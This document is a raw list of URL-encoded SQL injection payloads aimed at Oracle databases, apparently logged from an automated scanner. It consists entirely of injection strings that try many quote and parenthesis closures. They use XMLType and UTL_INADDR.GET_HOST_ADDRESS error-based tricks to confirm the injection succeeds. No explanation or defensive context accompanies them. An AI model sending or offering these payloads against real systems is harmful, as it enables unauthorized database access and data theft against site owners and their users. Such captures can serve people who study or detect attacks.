-7010%22%20OR%203646%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283646%3D3646%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 -8479%29%20OR%203646%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283646%3D3646%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%281912%3D1912 -2642%29%29%20OR%203646%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283646%3D3646%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%287697%3D7697 -4082%29%29%29%20OR%203646%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283646%3D3646%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%283145%3D3145 -4715%20OR%203646%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283646%3D3646%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 -6099%27%29%20OR%203646%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283646%3D3646%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%27svLq%27%3D%27svLq -9356%27%29%29%20OR%203646%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283646%3D3646%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%27skfM%27%3D%27skfM -9327%27%29%29%29%20OR%203646%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283646%3D3646%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%28%27kauK%27%3D%27kauK -8943%27%20OR%203646%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283646%3D3646%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%27igjg%27%3D%27igjg -3201%27%29%20OR%203646%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283646%3D3646%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%27dsYt%27%20LIKE%20%27dsYt -3589%27%29%29%20OR%203646%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283646%3D3646%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%27BefX%27%20LIKE%20%27BefX -9285%27%29%29%29%20OR%203646%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283646%3D3646%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%28%27qskG%27%20LIKE%20%27qskG -2307%27%20OR%203646%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283646%3D3646%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%27qWur%27%20LIKE%20%27qWur -1297%22%29%20OR%203646%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283646%3D3646%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%22JFDY%22%3D%22JFDY -9307%22%29%29%20OR%203646%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283646%3D3646%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%22MIBV%22%3D%22MIBV -3265%22%29%29%29%20OR%203646%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283646%3D3646%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%28%22zVQo%22%3D%22zVQo -8752%22%20OR%203646%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283646%3D3646%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%22rMfi%22%3D%22rMfi -8319%22%29%20OR%203646%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283646%3D3646%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%22YpuR%22%20LIKE%20%22YpuR -6221%22%29%29%20OR%203646%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283646%3D3646%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%22OebB%22%20LIKE%20%22OebB -8295%22%29%29%29%20OR%203646%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283646%3D3646%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%28%22qUYW%22%20LIKE%20%22qUYW -2633%22%20OR%203646%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283646%3D3646%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%22aNqF%22%20LIKE%20%22aNqF -7256%25%27%29%20OR%203646%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283646%3D3646%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%27%25%27%3D%27 -4532%25%27%29%29%20OR%203646%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283646%3D3646%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%27%25%27%3D%27 -4528%25%27%29%29%29%20OR%203646%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283646%3D3646%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%28%27%25%27%3D%27 -1317%25%27%20OR%203646%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283646%3D3646%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%27%25%27%3D%27 -5251%00%27%29%20OR%203646%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283646%3D3646%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%27YYFV%27%3D%27YYFV -5439%00%27%20OR%203646%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283646%3D3646%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%27NqgE%27%3D%27NqgE -2837%27%29%20WHERE%209634%3D9634%20OR%203646%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283646%3D3646%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20--%20 -6676%22%29%20WHERE%204440%3D4440%20OR%203646%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283646%3D3646%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20--%20 -7640%29%20WHERE%207311%3D7311%20OR%203646%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283646%3D3646%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20--%20 -9742%27%20WHERE%203230%3D3230%20OR%203646%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283646%3D3646%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20--%20 -8113%22%20WHERE%207036%3D7036%20OR%203646%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283646%3D3646%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20--%20 -2564%20WHERE%204227%3D4227%20OR%203646%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283646%3D3646%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20--%20 -1114%29%20OR%205323%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285323%3D5323%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29 -1740%27%29%20OR%205323%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285323%3D5323%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29 -1291%27%20OR%205323%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285323%3D5323%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29 -8133%22%20OR%205323%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285323%3D5323%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29 -8125%29%20OR%205323%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285323%3D5323%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AND%20%285548%3D5548 -4530%29%29%20OR%205323%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285323%3D5323%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AND%20%28%281837%3D1837 -2653%29%29%29%20OR%205323%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285323%3D5323%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AND%20%28%28%286225%3D6225 -3967%20OR%205323%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285323%3D5323%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29 -4998%27%29%20OR%205323%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285323%3D5323%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AND%20%28%27wmjq%27%3D%27wmjq -7030%27%29%29%20OR%205323%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285323%3D5323%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AND%20%28%28%27csAU%27%3D%27csAU -8428%27%29%29%29%20OR%205323%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285323%3D5323%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AND%20%28%28%28%27EFVT%27%3D%27EFVT -6824%27%20OR%205323%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285323%3D5323%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AND%20%27jlgm%27%3D%27jlgm -6203%27%29%20OR%205323%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285323%3D5323%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AND%20%28%27zlVM%27%20LIKE%20%27zlVM -6150%27%29%29%20OR%205323%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285323%3D5323%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AND%20%28%28%27LnRR%27%20LIKE%20%27LnRR -3145%27%29%29%29%20OR%205323%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285323%3D5323%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AND%20%28%28%28%27jkhh%27%20LIKE%20%27jkhh -3088%27%20OR%205323%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285323%3D5323%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AND%20%27JyyL%27%20LIKE%20%27JyyL -5855%22%29%20OR%205323%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285323%3D5323%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AND%20%28%22TUWS%22%3D%22TUWS -7690%22%29%29%20OR%205323%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285323%3D5323%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AND%20%28%28%22ZsmX%22%3D%22ZsmX 